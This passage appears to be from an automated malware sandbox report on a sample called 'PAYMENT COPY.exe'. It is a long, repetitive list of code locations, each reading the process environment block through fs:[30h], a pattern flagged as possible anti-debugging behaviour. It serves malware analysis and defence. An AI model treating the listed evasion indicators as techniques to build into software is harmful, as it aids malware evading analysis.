                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E1D0 mov eax, dword ptr fs:[00000030h]1_2_0104E1D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E1D0 mov ecx, dword ptr fs:[00000030h]1_2_0104E1D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E1D0 mov eax, dword ptr fs:[00000030h]1_2_0104E1D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E1D0 mov eax, dword ptr fs:[00000030h]1_2_0104E1D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCA020 mov eax, dword ptr fs:[00000030h]1_2_00FCA020
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCC020 mov eax, dword ptr fs:[00000030h]1_2_00FCC020
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEE016 mov eax, dword ptr fs:[00000030h]1_2_00FEE016
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEE016 mov eax, dword ptr fs:[00000030h]1_2_00FEE016
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEE016 mov eax, dword ptr fs:[00000030h]1_2_00FEE016
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEE016 mov eax, dword ptr fs:[00000030h]1_2_00FEE016
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A61E5 mov eax, dword ptr fs:[00000030h]1_2_010A61E5
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010001F8 mov eax, dword ptr fs:[00000030h]1_2_010001F8
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01054000 mov ecx, dword ptr fs:[00000030h]1_2_01054000
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01072000 mov eax, dword ptr fs:[00000030h]1_2_01072000
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01072000 mov eax, dword ptr fs:[00000030h]1_2_01072000
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01072000 mov eax, dword ptr fs:[00000030h]1_2_01072000
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01072000 mov eax, dword ptr fs:[00000030h]1_2_01072000
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01072000 mov eax, dword ptr fs:[00000030h]1_2_01072000
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01072000 mov eax, dword ptr fs:[00000030h]1_2_01072000
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01072000 mov eax, dword ptr fs:[00000030h]1_2_01072000
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01072000 mov eax, dword ptr fs:[00000030h]1_2_01072000
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01066030 mov eax, dword ptr fs:[00000030h]1_2_01066030
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01056050 mov eax, dword ptr fs:[00000030h]1_2_01056050
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCA197 mov eax, dword ptr fs:[00000030h]1_2_00FCA197
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCA197 mov eax, dword ptr fs:[00000030h]1_2_00FCA197
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCA197 mov eax, dword ptr fs:[00000030h]1_2_00FCA197
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6154 mov eax, dword ptr fs:[00000030h]1_2_00FD6154
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6154 mov eax, dword ptr fs:[00000030h]1_2_00FD6154
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCC156 mov eax, dword ptr fs:[00000030h]1_2_00FCC156
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010680A8 mov eax, dword ptr fs:[00000030h]1_2_010680A8
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010960B8 mov eax, dword ptr fs:[00000030h]1_2_010960B8
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010960B8 mov ecx, dword ptr fs:[00000030h]1_2_010960B8
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010520DE mov eax, dword ptr fs:[00000030h]1_2_010520DE
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010560E0 mov eax, dword ptr fs:[00000030h]1_2_010560E0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010120F0 mov ecx, dword ptr fs:[00000030h]1_2_010120F0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A30B mov eax, dword ptr fs:[00000030h]1_2_0100A30B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A30B mov eax, dword ptr fs:[00000030h]1_2_0100A30B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A30B mov eax, dword ptr fs:[00000030h]1_2_0100A30B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE02E1 mov eax, dword ptr fs:[00000030h]1_2_00FE02E1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE02E1 mov eax, dword ptr fs:[00000030h]1_2_00FE02E1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE02E1 mov eax, dword ptr fs:[00000030h]1_2_00FE02E1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]1_2_00FDA2C3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]1_2_00FDA2C3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]1_2_00FDA2C3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]1_2_00FDA2C3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]1_2_00FDA2C3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01078350 mov ecx, dword ptr fs:[00000030h]1_2_01078350
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105035C mov eax, dword ptr fs:[00000030h]1_2_0105035C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105035C mov eax, dword ptr fs:[00000030h]1_2_0105035C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105035C mov eax, dword ptr fs:[00000030h]1_2_0105035C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105035C mov ecx, dword ptr fs:[00000030h]1_2_0105035C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105035C mov eax, dword ptr fs:[00000030h]1_2_0105035C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105035C mov eax, dword ptr fs:[00000030h]1_2_0105035C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109A352 mov eax, dword ptr fs:[00000030h]1_2_0109A352
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE02A0 mov eax, dword ptr fs:[00000030h]1_2_00FE02A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE02A0 mov eax, dword ptr fs:[00000030h]1_2_00FE02A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107437C mov eax, dword ptr fs:[00000030h]1_2_0107437C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FC826B mov eax, dword ptr fs:[00000030h]1_2_00FC826B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD4260 mov eax, dword ptr fs:[00000030h]1_2_00FD4260
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD4260 mov eax, dword ptr fs:[00000030h]1_2_00FD4260
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD4260 mov eax, dword ptr fs:[00000030h]1_2_00FD4260
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6259 mov eax, dword ptr fs:[00000030h]1_2_00FD6259
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCA250 mov eax, dword ptr fs:[00000030h]1_2_00FCA250
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0108C3CD mov eax, dword ptr fs:[00000030h]1_2_0108C3CD
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010563C0 mov eax, dword ptr fs:[00000030h]1_2_010563C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FC823B mov eax, dword ptr fs:[00000030h]1_2_00FC823B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010743D4 mov eax, dword ptr fs:[00000030h]1_2_010743D4
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010743D4 mov eax, dword ptr fs:[00000030h]1_2_010743D4
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107E3DB mov eax, dword ptr fs:[00000030h]1_2_0107E3DB
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107E3DB mov eax, dword ptr fs:[00000030h]1_2_0107E3DB
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107E3DB mov ecx, dword ptr fs:[00000030h]1_2_0107E3DB
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107E3DB mov eax, dword ptr fs:[00000030h]1_2_0107E3DB
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010063FF mov eax, dword ptr fs:[00000030h]1_2_010063FF
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEE3F0 mov eax, dword ptr fs:[00000030h]1_2_00FEE3F0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEE3F0 mov eax, dword ptr fs:[00000030h]1_2_00FEE3F0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEE3F0 mov eax, dword ptr fs:[00000030h]1_2_00FEE3F0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE03E9 mov eax, dword ptr fs:[00000030h]1_2_00FE03E9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE03E9 mov eax, dword ptr fs:[00000030h]1_2_00FE03E9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE03E9 mov eax, dword ptr fs:[00000030h]1_2_00FE03E9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE03E9 mov eax, dword ptr fs:[00000030h]1_2_00FE03E9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE03E9 mov eax, dword ptr fs:[00000030h]1_2_00FE03E9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE03E9 mov eax, dword ptr fs:[00000030h]1_2_00FE03E9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE03E9 mov eax, dword ptr fs:[00000030h]1_2_00FE03E9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE03E9 mov eax, dword ptr fs:[00000030h]1_2_00FE03E9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD83C0 mov eax, dword ptr fs:[00000030h]1_2_00FD83C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD83C0 mov eax, dword ptr fs:[00000030h]1_2_00FD83C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD83C0 mov eax, dword ptr fs:[00000030h]1_2_00FD83C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD83C0 mov eax, dword ptr fs:[00000030h]1_2_00FD83C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]1_2_00FDA3C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]1_2_00FDA3C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]1_2_00FDA3C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]1_2_00FDA3C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]1_2_00FDA3C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]1_2_00FDA3C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01058243 mov eax, dword ptr fs:[00000030h]1_2_01058243
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01058243 mov ecx, dword ptr fs:[00000030h]1_2_01058243
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0108A250 mov eax, dword ptr fs:[00000030h]1_2_0108A250
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0108A250 mov eax, dword ptr fs:[00000030h]1_2_0108A250
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FC8397 mov eax, dword ptr fs:[00000030h]1_2_00FC8397
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FC8397 mov eax, dword ptr fs:[00000030h]1_2_00FC8397
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FC8397 mov eax, dword ptr fs:[00000030h]1_2_00FC8397
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF438F mov eax, dword ptr fs:[00000030h]1_2_00FF438F
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF438F mov eax, dword ptr fs:[00000030h]1_2_00FF438F
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCE388 mov eax, dword ptr fs:[00000030h]1_2_00FCE388
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCE388 mov eax, dword ptr fs:[00000030h]1_2_00FCE388
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCE388 mov eax, dword ptr fs:[00000030h]1_2_00FCE388
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E284 mov eax, dword ptr fs:[00000030h]1_2_0100E284
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E284 mov eax, dword ptr fs:[00000030h]1_2_0100E284
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01050283 mov eax, dword ptr fs:[00000030h]1_2_01050283
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01050283 mov eax, dword ptr fs:[00000030h]1_2_01050283
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01050283 mov eax, dword ptr fs:[00000030h]1_2_01050283
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010662A0 mov eax, dword ptr fs:[00000030h]1_2_010662A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010662A0 mov ecx, dword ptr fs:[00000030h]1_2_010662A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010662A0 mov eax, dword ptr fs:[00000030h]1_2_010662A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010662A0 mov eax, dword ptr fs:[00000030h]1_2_010662A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010662A0 mov eax, dword ptr fs:[00000030h]1_2_010662A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010662A0 mov eax, dword ptr fs:[00000030h]1_2_010662A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCC310 mov ecx, dword ptr fs:[00000030h]1_2_00FCC310
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF0310 mov ecx, dword ptr fs:[00000030h]1_2_00FF0310
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01066500 mov eax, dword ptr fs:[00000030h]1_2_01066500
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4500 mov eax, dword ptr fs:[00000030h]1_2_010A4500
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4500 mov eax, dword ptr fs:[00000030h]1_2_010A4500
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4500 mov eax, dword ptr fs:[00000030h]1_2_010A4500
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4500 mov eax, dword ptr fs:[00000030h]1_2_010A4500
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4500 mov eax, dword ptr fs:[00000030h]1_2_010A4500
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4500 mov eax, dword ptr fs:[00000030h]1_2_010A4500
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4500 mov eax, dword ptr fs:[00000030h]1_2_010A4500
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD04E5 mov ecx, dword ptr fs:[00000030h]1_2_00FD04E5
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD64AB mov eax, dword ptr fs:[00000030h]1_2_00FD64AB
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100656A mov eax, dword ptr fs:[00000030h]1_2_0100656A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100656A mov eax, dword ptr fs:[00000030h]1_2_0100656A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100656A mov eax, dword ptr fs:[00000030h]1_2_0100656A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01004588 mov eax, dword ptr fs:[00000030h]1_2_01004588
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFA470 mov eax, dword ptr fs:[00000030h]1_2_00FFA470
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFA470 mov eax, dword ptr fs:[00000030h]1_2_00FFA470
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFA470 mov eax, dword ptr fs:[00000030h]1_2_00FFA470
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E59C mov eax, dword ptr fs:[00000030h]1_2_0100E59C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FC645D mov eax, dword ptr fs:[00000030h]1_2_00FC645D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010505A7 mov eax, dword ptr fs:[00000030h]1_2_010505A7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010505A7 mov eax, dword ptr fs:[00000030h]1_2_010505A7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010505A7 mov eax, dword ptr fs:[00000030h]1_2_010505A7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF245A mov eax, dword ptr fs:[00000030h]1_2_00FF245A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E5CF mov eax, dword ptr fs:[00000030h]1_2_0100E5CF
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E5CF mov eax, dword ptr fs:[00000030h]1_2_0100E5CF
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A5D0 mov eax, dword ptr fs:[00000030h]1_2_0100A5D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A5D0 mov eax, dword ptr fs:[00000030h]1_2_0100A5D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCC427 mov eax, dword ptr fs:[00000030h]1_2_00FCC427
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCE420 mov eax, dword ptr fs:[00000030h]1_2_00FCE420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCE420 mov eax, dword ptr fs:[00000030h]1_2_00FCE420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCE420 mov eax, dword ptr fs:[00000030h]1_2_00FCE420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100C5ED mov eax, dword ptr fs:[00000030h]1_2_0100C5ED
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100C5ED mov eax, dword ptr fs:[00000030h]1_2_0100C5ED
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01008402 mov eax, dword ptr fs:[00000030h]1_2_01008402
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01008402 mov eax, dword ptr fs:[00000030h]1_2_01008402
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01008402 mov eax, dword ptr fs:[00000030h]1_2_01008402
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_00FFE5E7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_00FFE5E7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_00FFE5E7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_00FFE5E7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_00FFE5E7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_00FFE5E7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_00FFE5E7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_00FFE5E7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD25E0 mov eax, dword ptr fs:[00000030h]1_2_00FD25E0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01056420 mov eax, dword ptr fs:[00000030h]1_2_01056420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01056420 mov eax, dword ptr fs:[00000030h]1_2_01056420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01056420 mov eax, dword ptr fs:[00000030h]1_2_01056420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01056420 mov eax, dword ptr fs:[00000030h]1_2_01056420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01056420 mov eax, dword ptr fs:[00000030h]1_2_01056420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01056420 mov eax, dword ptr fs:[00000030h]1_2_01056420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01056420 mov eax, dword ptr fs:[00000030h]1_2_01056420
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD65D0 mov eax, dword ptr fs:[00000030h]1_2_00FD65D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E443 mov eax, dword ptr fs:[00000030h]1_2_0100E443
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E443 mov eax, dword ptr fs:[00000030h]1_2_0100E443
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E443 mov eax, dword ptr fs:[00000030h]1_2_0100E443
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E443 mov eax, dword ptr fs:[00000030h]1_2_0100E443
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E443 mov eax, dword ptr fs:[00000030h]1_2_0100E443
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E443 mov eax, dword ptr fs:[00000030h]1_2_0100E443
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E443 mov eax, dword ptr fs:[00000030h]1_2_0100E443
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E443 mov eax, dword ptr fs:[00000030h]1_2_0100E443
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF45B1 mov eax, dword ptr fs:[00000030h]1_2_00FF45B1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF45B1 mov eax, dword ptr fs:[00000030h]1_2_00FF45B1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0108A456 mov eax, dword ptr fs:[00000030h]1_2_0108A456
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105C460 mov ecx, dword ptr fs:[00000030h]1_2_0105C460
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD2582 mov eax, dword ptr fs:[00000030h]1_2_00FD2582
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD2582 mov ecx, dword ptr fs:[00000030h]1_2_00FD2582
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0108A49A mov eax, dword ptr fs:[00000030h]1_2_0108A49A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD8550 mov eax, dword ptr fs:[00000030h]1_2_00FD8550
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD8550 mov eax, dword ptr fs:[00000030h]1_2_00FD8550
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010044B0 mov ecx, dword ptr fs:[00000030h]1_2_010044B0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105A4B0 mov eax, dword ptr fs:[00000030h]1_2_0105A4B0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE53E mov eax, dword ptr fs:[00000030h]1_2_00FFE53E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE53E mov eax, dword ptr fs:[00000030h]1_2_00FFE53E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE53E mov eax, dword ptr fs:[00000030h]1_2_00FFE53E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE53E mov eax, dword ptr fs:[00000030h]1_2_00FFE53E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE53E mov eax, dword ptr fs:[00000030h]1_2_00FFE53E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0535 mov eax, dword ptr fs:[00000030h]1_2_00FE0535
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0535 mov eax, dword ptr fs:[00000030h]1_2_00FE0535
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0535 mov eax, dword ptr fs:[00000030h]1_2_00FE0535
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0535 mov eax, dword ptr fs:[00000030h]1_2_00FE0535
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0535 mov eax, dword ptr fs:[00000030h]1_2_00FE0535
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0535 mov eax, dword ptr fs:[00000030h]1_2_00FE0535
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100C700 mov eax, dword ptr fs:[00000030h]1_2_0100C700
